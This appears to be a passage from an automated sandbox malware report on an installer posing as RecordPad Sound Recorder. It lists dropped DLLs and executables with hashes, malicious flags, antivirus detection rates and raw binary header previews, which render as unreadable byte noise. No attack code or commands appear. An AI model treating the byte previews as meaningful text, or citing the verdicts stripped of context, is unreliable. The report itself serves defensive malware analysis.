                                                                                    MD5:61CF5C843D8A31162B59C074AE74A76E
                                                                                    SHA1:123E0EACE3DD60FEF94DC96215468D22434C50FB
                                                                                    SHA-256:F51BB73407C96E4A2E3016A96A870FA4B422A8B1851477048D122CCC2D523687
                                                                                    SHA-512:AA1C3175D9A0E11341B8A2F1C5372E99E1164169C8FC71727A0FE6655878782E921FA046D6A83CA2E2C67DAE0609704442EBCFDBE985281F02DDB7E288DC718D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................2.&......<......>..................qY/....qY1....qY*.....8<............8......8=.....8?....Rich............................PE..d...F..].........." ......................................................... ......S.....`.............................................d...............................h!......\...`...8...............................p............................................text............................... ..`.rdata..t...........................@..@.data...a...........................@....pdata..............................@..@.idata..8(.......*..................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-0C056.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):320120
                                                                                    Entropy (8bit):6.398399631689542
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:bSU6+JAfisltPzYzrIybvaEezwMckNI+STEDv4nk3ad04ZqhKTrg+COv:brAltbYzsOvaWJ
                                                                                    MD5:DB19F6E0A1BB5DB1C8D87C3FE0891136
                                                                                    SHA1:3B2DAB478A8268000EF5E4474D52CB71F9EB615E
                                                                                    SHA-256:7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
                                                                                    SHA-512:B328DC6D1ADE3061894BC5C50F437B732190DE3CEA6D2CDC147A9A8193EE73221937FBA24209B66226D5E4B05DFFF5A79DB8B134373D1218605BCBA6EE82A6B3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@hB:!..:!..:!..3Y..2!...L..8!..aI..8!...L..,!...L..2!...L..9!...O..=!..:!..."...O../!...O..;!...O..;!..:!..;!...O..;!..Rich:!..........................PE..d....lP_.........." .....\...v......$_...................................................`..........................................5...........................,......x.......|...P...T.......................(....................p..p............................text....[.......\.................. ..`.rdata..."...p...$...`..............@..@.data...8...........................@....pdata...,..........................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-6P98M.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):20840
                                                                                    Entropy (8bit):6.3244920295043645
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:rk3cFbdBtZHvagGFsGfZyGmGovy8ZpHEi+:rk0vHy9oyiRM
                                                                                    MD5:D2BC90D6AF120A0643AD5DC5F3CE8D43
                                                                                    SHA1:419C3246B08125754CCBB4323DD823F8DA0548CB
                                                                                    SHA-256:BDED78571A2E60B3324AB9B4D3DDB6DE12FC08CB4BBE6A582A2C2292AA17CCE6
                                                                                    SHA-512:F34C90E44F473A8CD62B75B6D531FDD47AD132A3F1BCE7AD5C0DDF30C61A2454BA214AA2B6CD50C2A1B6CD3AC85F2D9989775376A400D34EBBD2EFAB0FBECC7A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ovA{+./(+./(+./("o.(/./(yb.))./(yb*)%./(yb+)#./(yb,)(./(?|.)../(+..(../(.b*)*./(.b/)*./(.b.(*./(.b-)*./(Rich+./(........................PE..d....z{c.........." ......... .......................................................7....`..........................................8..t...T;..x....p.......`.......0..h!......<....1...............................2..8............0..(............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc..<...........................@..B........................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-8ECK7.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):248680
                                                                                    Entropy (8bit):4.820760286569876
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:k6bBPHJr5r5C9Fg8Imnw5bR3Kklo7rbQox:kz
                                                                                    MD5:60BAB1D197D91828ED25099968F7D8C5
                                                                                    SHA1:FC8E1B3C2C98727D2D81A8E85420FA80EE655F19
                                                                                    SHA-256:F682B5AA0AF3CEE93F890EC6717F94C1AC9B75EBFF512955C6531E7CEE05D196
                                                                                    SHA-512:5B9CBB11E3FCB00FD76F595520DA4610FA37B0F1227D016D77350909846BA33AF9A32B650BB1CE9A73549DB5BF190C2205E28223D1745191B2424F6DC7327B38
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........e..6..6..6..`6..6...7..6...7..6...7..6...7..62..7..6J..7..62..7..6l..7..6..6...6l..7..6l..7..6l..6..6.d6..6l..7..6Rich..6........................PE..d...3N2c.........." ................................................................U....`..........................................&...0..(W..,.... ..................h!..............T...........................`...8............................................text...+........................... ..`.rdata..v'.......(..................@..@.data...x%....... ..................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-BRGIM.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):51
                                                                                    Entropy (8bit):3.48286657951254
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:cUoytoUD6MBomFUT:cUoQoUD6Qoyy
                                                                                    MD5:034D89CD2C41EDFCEADA9F96A3C0A56A
                                                                                    SHA1:92AB4E6FF98CA987D56EA3C1BA36D1C61EF23ACB
                                                                                    SHA-256:44BBE94D481B106F00223DD406D015AEFD00CFA2DBA9428BEFC2B8F6A3FEB971
                                                                                    SHA-512:6C3E701D2D0FD24FDB46C0E1B0EF5245F36E4A34A9D2340665A31F6331C2D6F08680399600FB02C3D51694F9BAFFB3E41A367CB4FE945D4836B669DA63EB6358
                                                                                    Malicious:false
                                                                                    Preview:1 1..4 3..3 2..16 9..6 5..468 60..728 90..2592 1936

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-C4R5U.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):963232
                                                                                    Entropy (8bit):6.634408584960502
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:FkZ+EUPoH5KTcAxt/qvRQdxQxO61kCS9mmWymzVPD:FkMAlM8ixQI5C6wl
                                                                                    MD5:9C861C079DD81762B6C54E37597B7712
                                                                                    SHA1:62CB65A1D79E2C5ADA0C7BFC04C18693567C90D0
                                                                                    SHA-256:AD32240BB1DE55C3F5FCAC8789F583A17057F9D14914C538C2A7A5AD346B341C
                                                                                    SHA-512:3AA770D6FBA8590FDCF5D263CB2B3D2FAE859E29D31AD482FBFBD700BCD602A013AC2568475999EF9FB06AE666D203D97F42181EC7344CBA023A8534FB13ACB7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ck.."..".."..D...".."..-"...s..$ ...s.."...s.."...s.. "...s.."...s.."...s.."..Rich."..........................PE..d.....OR.........." .....h...:.......)..............................................].....`.................................................@...(............@...s...t...>......8...p................................2..p............................................text....g.......h.................. ..`.rdata...8.......:...l..............@..@.data...hu.......D..................@....pdata...s...@...t..................@..@.rsrc................^..............@..@.reloc..8............b..............@..B........................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-EAHN0.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):31528
                                                                                    Entropy (8bit):6.472533190412445
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:R77JqjlI8icUYWhN5tWcS5gWZoMUekWi9pBj0HRN7RA5aWixHRN7osDhzlGs6N+E:R5D8icUlX5YYMLAWRAlypmPB
                                                                                    MD5:7EE2B93A97485E6222C393BFA653926B
                                                                                    SHA1:F4779CBFF235D21C386DA7276021F136CA233320
                                                                                    SHA-256:BD57D8EEF0BC3A757C5CE5F486A547C79E12482AC8E694C47A6AB794AA745F1F
                                                                                    SHA-512:4A4A3F56674B54683C88BD696AB5D02750E9A61F3089274FAA25E16A858805958E8BE1C391A257E73D889B1EEA30C173D0296509221D68A492A488D725C2B101
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..\4~.\4~.\4~...^4~.UL..X4~.Dz.[4~.D}.^4~.\4..v4~.D..Y4~.D{.O4~.D~.]4~.D..]4~.D|.]4~.Rich\4~.........PE..d...W8.^.........." .........$............................................................`A.........................................>..L....?..x....p.......`..4....:..(A......p...@3..T............................3..0............0..0............................text...(........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..4....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-FR4FM.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):660128
                                                                                    Entropy (8bit):6.339798513733826
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:N2fus43uu43Ry4GHlT4xH2K+M+/i+WSpY+7YOzCaK9A3gS2EKZm+GWodEEwnyh:muJzCaK9AB2EKZm+GWodEEwnyh
                                                                                    MD5:46060C35F697281BC5E7337AEE3722B1
                                                                                    SHA1:D0164C041707F297A73ABB9EA854111953E99CF1
                                                                                    SHA-256:2ABF0AAB5A3C5AE9424B64E9D19D9D6D4AEBC67814D7E92E4927B9798FEF2848
                                                                                    SHA-512:2CF2ED4D45C79A6E6CEBFA3D332710A97F5CF0251DC194EEC8C54EA0CB85762FD19822610021CCD6A6904E80AFAE1590A83AF1FA45152F28CA56D862A3473F0A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;..h..h..h..[h..h..h..h..Mh..hIAWh..h..Oh..h..qh..h..ph..h..uh..h..Lh..h..Kh..h..Nh..hRich..h................PE..d.....OR.........." .....@...................................................`......a.....`.........................................pU.. ....2..<....@...........G.......>...P.......X..................................p............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data........P...8...B..............@....pdata...G.......H...z..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-JNDNQ.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):135016
                                                                                    Entropy (8bit):5.674566205873397
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:GZU6fX6Kj693r/67BhRpsGmQhRJRVW8/mpI4Sx8K5aqEkmgcs8MYQJaqEkmgcs8o:GZU6qz3ERpNzhRvVoVDe1r0+
                                                                                    MD5:61CF5C843D8A31162B59C074AE74A76E
                                                                                    SHA1:123E0EACE3DD60FEF94DC96215468D22434C50FB
                                                                                    SHA-256:F51BB73407C96E4A2E3016A96A870FA4B422A8B1851477048D122CCC2D523687
                                                                                    SHA-512:AA1C3175D9A0E11341B8A2F1C5372E99E1164169C8FC71727A0FE6655878782E921FA046D6A83CA2E2C67DAE0609704442EBCFDBE985281F02DDB7E288DC718D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................2.&......<......>..................qY/....qY1....qY*.....8<............8......8=.....8?....Rich............................PE..d...F..].........." ......................................................... ......S.....`.............................................d...............................h!......\...`...8...............................p............................................text............................... ..`.rdata..t...........................@..@.data...a...........................@....pdata..............................@..@.idata..8(.......*..................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-K3HBS.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):590632
                                                                                    Entropy (8bit):6.463330275333709
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Mt8MRN4gE4x4iTqwTQa6IUqXF7XyxpypsdUDqNSfbQEKZm+jWodEEV3Ho/:MCMm9pyp35bQEKZm+jWodEExg
                                                                                    MD5:E74CAF5D94AA08D046A44ED6ED84A3C5
                                                                                    SHA1:ED9F696FA0902A7C16B257DA9B22FB605B72B12E
                                                                                    SHA-256:3DEDEF76C87DB736C005D06A8E0D084204B836AF361A6BD2EE4651D9C45675E8
                                                                                    SHA-512:D3128587BC8D62E4D53F8B5F95EB687BC117A6D5678C08DC6B59B72EA9178A7FD6AE8FAA9094D21977C406739D6C38A440134C1C1F6F9A44809E80D162723254
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*...*...*.....w.(...#...<...*......./.....".................+.....g.+.....+...Rich*...................PE..d...R8.^.........." .....>..........p"....................................................`A........................................ m..h....G..,...............(;......(A......4.......T...............................0............P......Ti..@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....:...`..."...P..............@....pdata..(;.......<...r..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KI2RB.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):213112
                                                                                    Entropy (8bit):6.331143352918189
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:V7rtKxzN2HVkkNUq3uUw8SWrBEcsGhLec956+48G+ikgyOzk1kLrTzhvt3GyY:Vr2N253eUw81rBXVevrH+mk12rTlS
                                                                                    MD5:63D91B407A350DA5CE19B5D79924B1F4
                                                                                    SHA1:45886A4018B60A5EAB7D4B743F4DF2A9A4318EDC
                                                                                    SHA-256:22B626313A535C85CE6A097571C53A6E6678A9D4BC5D0DB9F81660ADC7ED366E
                                                                                    SHA-512:FA06AB2B1AE116BC7AE93EA64D4C258A7149A23C0171C077F0919956101A22A59DD8E3F975C64073319842F01D6183253F637A0EDB514F0C02C9D88B0E65E6CF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u..j...j...j.......j.......j.. ....j.. ....j.. ....j.. ....j..i....j...j...j..i....j..i....j..i...j...j...j..i....j..Rich.j..................PE..d....kP_.........." .........,...............................................`............`..........................................t..._...........@..........t"...*..x....P.......;..T...........................`;...............................................text............................... ..`.rdata..............................@..@.data...............................@....pdata..t".......$..................@..@.rsrc........@....... ..............@..@.reloc.......P.......&..............@..B................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-KU10K.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):331384
                                                                                    Entropy (8bit):6.387255143196498
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:cOjmvCPMfXfCsXL0hq+SNcFxkqSj1ZBtp:fcC05tp
                                                                                    MD5:C3424F2D3D26632C341EF2F542AEA36B
                                                                                    SHA1:30640EBFF046085DBA3BD0877DE8A90886BED945
                                                                                    SHA-256:FB0BD60A7D0178C62CFD14D53B40AD47E8F68DB68B95C625723CADC1CD3A1A3E
                                                                                    SHA-512:72D9A32433DA38CFB752A67C5F903F3480871FCBD16DC5999FB970313079652CF7AEB481DA6097879B641A0E76271118C6E82406DD14C9C90C7460BA6A71BDC7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........O...........8...................................W............W.....W.....W.T.....<....W.....Rich...........................PE..d...z.P_.........." .........................................................@....../.....`..................................................*....... ...........1......x....0..8....N..T...................XP..(...PO...............................................text............................... ..`.rdata.............................@..@.data...............................@....pdata...1.......2..................@..@.rsrc........ ......................@..@.reloc..8....0......................@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-L7B6O.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1297
                                                                                    Entropy (8bit):5.115489615345492
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CbUneZXof9+bOOrXqFT09+JYrXqFTzl796432s4EOkUs8QROJ32s3yxsITf+3t1e:Cn3OOrXqJ07rXqJzr6432sv832s3EsI/
                                                                                    MD5:AAF4009F5963B1B270D8C3E697EBE442
                                                                                    SHA1:F5A44235094DA0B8B5992C6112CB8C356EF22B93
                                                                                    SHA-256:3988CDCCB878675B4AB8C11F21EF7F6301451F59E2E2BF3F07E963D36C8E9767
                                                                                    SHA-512:BC30F4C5F17E4F0CDE2CDD5C36A6EC28271569E18808E736186D42409564E3E6FFA8AD23842912C90F39CE6264A698714A434092778C74CBDE6C330DD3969109
                                                                                    Malicious:false
                                                                                    Preview:Copyright (c) 2013, Cisco Systems.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice, this. list of conditions and the following disclaimer in the documentation and/or. other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERV

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-O2PKH.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):707354
                                                                                    Entropy (8bit):6.470926417661749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:D0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv95ELAfXExy8z:nfKbT5lrPo37AzHTA63/cfU9IEU953fo
                                                                                    MD5:F2E1861AB7EFD6358283CF101045A727
                                                                                    SHA1:15F34DC254FE02A84F2F8AD4D5495D7E799F2F9B
                                                                                    SHA-256:35A50C7721675C5422D5F7979912FB1B2BE5811CBBAFBA60FEA36D2DBBC87190
                                                                                    SHA-512:C92F41CEFDEC7305C526F5903509760512F9DC152AFC2969F40B40ACABDAD41CF40273BAC8CEECBA47C4BC0DACDA14D0DA74B8312AFFF37CFADBD8EF8933C685
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-OIVVM.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2963553
                                                                                    Entropy (8bit):6.794411160720888
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:i5F8VSyAJvaA5z8wbu33Lti5WGzndHKX5HCn:i5F8bAJyez8P33LtiEGzndHKX5w
                                                                                    MD5:4C9BEC9E2BD8F9AEDA07A75F84765891
                                                                                    SHA1:42E26A9C1BA81B355525318BF49E5F44470BA666
                                                                                    SHA-256:CB4626F720592DF58CA049CDD31CB03D769735C431428DA340421B2677A13915
                                                                                    SHA-512:851243C518F56F7B38ABD56E7A39BA0418685C354345FFB4490B489584AD08D474E001799F4E17421EFF23D6E177EF108CB78CB9EFC0893C10949A11DDB97938
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-OIVVM.tmp, Author: Joe Security
                                                                                    Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........&...............................@..........................`-.........................................................@............................................................................................................text............................... ..`.bhead8.n*.......0..................@..@.data...xT...0...@...0..............@....rsrc................p..............@..@.chead8.........a...................a.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-PRP4U.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):869224
                                                                                    Entropy (8bit):6.632387605957213
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:DJf34ppw4hjg401r+iTy2mmzuF3SJciti0ZIj8UoJwCR:Dl3ypw4yN/RiF3SJdO8xJv
                                                                                    MD5:DAA904CE63B0A290111AED5E843B9368
                                                                                    SHA1:6642AD5C2622D756EB3500E7C0420E9DA7A16BB1
                                                                                    SHA-256:471BBC3FA0A98869F6791E0D1A55B38F5E360842A7CC219A6FF26030E62DBB1B
                                                                                    SHA-512:CBFD06523F1855AAF4BE2D33EB3A3A324C8D7AF4871B314AC2C165FD17F8DA6CD2F465E9405412282AAC1ED247B811A4A73D91069A324A5AEC531253AE3A4D0B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.9d0.W70.W70.W7...73.W70.V7m.W7.M.71.W7v..7..W7v..7..W7v..7$.W7.s.7e.W70.W7'.W7.s.71.W7=..71.W7.s.71.W7Rich0.W7........PE..d......].........." .....8...........\...............................................$....`.................................................|...(....`..........x]..."..h!...p.......R..8...............................p............P..H............................text...7+.......,.................. ..`.rodata......@.......0.............. ..`.rdata..FP...P...R...<..............@..@.data... K.......&..................@....pdata..x].......^..................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-RV2D1.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):469624
                                                                                    Entropy (8bit):6.027128925039679
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:g814pr+wMrppkALmug7u7ozC/B4OvCH9UYHeAeBC:u9+wAkAS2j/B4BryC
                                                                                    MD5:820FFF478DC5F2C2D5F03A5DB9187FBC
                                                                                    SHA1:BD58AA8596345C837E1743617452EC7D73013F3A
                                                                                    SHA-256:3DC976E86D64881E0F37A54B5A04E903235E94D858889B1261527F0048CFBC03
                                                                                    SHA-512:1476919C5C133ACA519B9E9BE2684A85C7E669FA43942204ACDD9EC4A40577F966AD17D30A7EBD3A97A871E71178F0058966410A934822B96F0B2D7120AA43CB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m>W.)_9.)_9.)_9. '../_9..28.+_9..2<.?_9..2=.!_9..2:.*_9.r7=.(_9.r78.%_9..18.,_9.)_8.._9..1<.&_9..19.(_9..1.(_9.)_..(_9..1;.(_9.Rich)_9.........PE..d...G.P_.........." .................................................................[....`.........................................0d...:...................p...K......x.......h....B..T...................8D..(...0C...............0...............................text...t........................... ..`.rdata.......0....... ..............@..@.data..............................@....pdata...K...p...L..................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2042352
                                                                                    Entropy (8bit):7.085275197144553
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:OFZD9URlmDrgBrhEci8XhP3YLd44RS6+FNbqUzUxVvqKGTZnIzudBDFPjQAr10Fu:+ZeLrXFcL0YF7pvtHkfH
                                                                                    MD5:876A839023B8F962A72D295DA7495734
                                                                                    SHA1:62A7728679BC18784B1FBF1D013F7CECE18CBEC9
                                                                                    SHA-256:A757D773DA406411FB977761F6E56F016D48D224AEDAF3D875ED4D4A9EDE6158
                                                                                    SHA-512:E1B23A2F5EC0100FF874CA075BBD0F90E9065A90FEC66861F99DF603D7AAA9DB8E8EC326710FDC11AD41D01BEFE4EA3077136127ACF613614D0D12FF23BEC6C1
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^............................4.............@..........................@.......................................................p...3..............X............................................................................................text............................... ..`.rdata..x%.......0..................@..@.data....S.......0..................@....rsrc....@...p...@...@..............@..@.vcp1208............................a.G.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UTKLG.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):363880
                                                                                    Entropy (8bit):6.3947346615222305
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:lieS4N0DdxBa72yNQuqped6c7Bv5ebr+U2pyQqsa3a8g+QTW:UeSyCVaiyNQAd6cV5K+Jp37W
                                                                                    MD5:460B0576549FFD1F55D717BA6E265A05
                                                                                    SHA1:65AB7E2109658102678C122D7DE603E64DCE7CC5
                                                                                    SHA-256:AAB56C21B6CEC7065882A750BECB4526B4CB5815A4AC002C2594F84FB0F5955F
